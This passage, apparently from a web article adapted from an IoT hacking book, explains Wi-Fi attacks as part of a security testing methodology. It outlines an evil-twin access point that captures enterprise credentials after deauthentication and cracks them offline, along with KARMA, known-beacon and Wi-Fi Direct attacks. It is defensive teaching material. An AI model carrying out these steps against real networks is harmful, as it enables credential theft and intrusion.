First, we create a fake infrastructure that contains a fake access point and a RADIUS server. This access point must mimic a legitimate one, work with the same BSSID, ESSID, and channel. Then, since we’re targeting clients, not access points, we deauthenticate the access point clients. By default, clients will attempt to reconnect to the target access point, after which our malicious access point intercepts connections to the target devices. That way we can get their credentials. The received credentials will be encrypted according to protocol requirements. Fortunately for us, PEAP and EAP-TTLS use the MS-CHAPv2 encryption algorithm, which implements the DES data encryption standard, which is easy to crack. With a list of intercepted encrypted credentials, we can launch an offline brute force attack and recover the victim’s credentials.

Testing methodology

To assess the security of Wi-Fi-enabled systems, you can use the methodology described here, which covers the attacks described in this section. First, check if the device supports Wi-Fi Direct and related methods (PIN, PBC, or both). If so, it may be vulnerable to hacking pins or EvilDirect attacks.

Next, check the device and its wireless capabilities. If a wireless device supports STA capabilities (that is, it can be used as an access point or as a client), it may be vulnerable to a connection request attack. A situation is possible when the client automatically connects to previously connected networks. If so, it may be vulnerable to attack by known beacons. Ensure that the client does not send arbitrary requests to previously connected networks. If so, it may be vulnerable to a KARMA attack.

Determine if the device supports any third-party Wi-Fi utilities, such as special software used to automatically configure Wi-Fi. These utilities may have dangerous settings enabled by default due to carelessness. Learn how the device works. Are there any critical operations over Wi-Fi? In this case, the denial of service may be caused by the device being blocked. Additionally, in cases where a wireless device supports access point capabilities, it may be vulnerable to incorrect authentication.

Then find possible hardcoded keys. Devices configured to support WPA2 Personal may come with a hard-coded key. This is a common mistake that can provide you with an easy win. For corporate networks that use WPA Enterprise, determine which authentication method is used on the network. Networks using PEAP and EAP-TTLS may be vulnerable to the compromise of their client credentials. Enterprise networks should use EAP-TLS instead.


Recent advances in technologies such as Wi-Fi have made significant contributions to the IoT ecosystem, allowing people and devices to be more connected than ever before. Most users expect a standard level of connectivity wherever they are, and organizations regularly rely on Wi-Fi and other wireless protocols to improve their productivity.

In this section, we demonstrated Wi-Fi attacks on clients and access points using standard tools, revealing the large attack surface that medium-range radio protocols inevitably expose. In this regard, you should be well versed in various attacks on Wi-Fi networks, from signal jamming and network disruption to associative attacks such as KARMA and Known Beacons. We’ve covered some of the key features of Wi-Fi Direct in detail and how to hack them with pin hacks and the EvilDirect attack. We then looked at the WPA2 Personal and Enterprise security protocols and identified their most important vulnerabilities. Let this section guide you in evaluating your Wi-Fi network.

We used materials from the book “The Definitive Guide to Attacking the Internet of Things” written by Photios Chantsis, Ioannis Stais,
Paulino Calderon, Evangelos Deirmentsoglu and Beau Woods.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.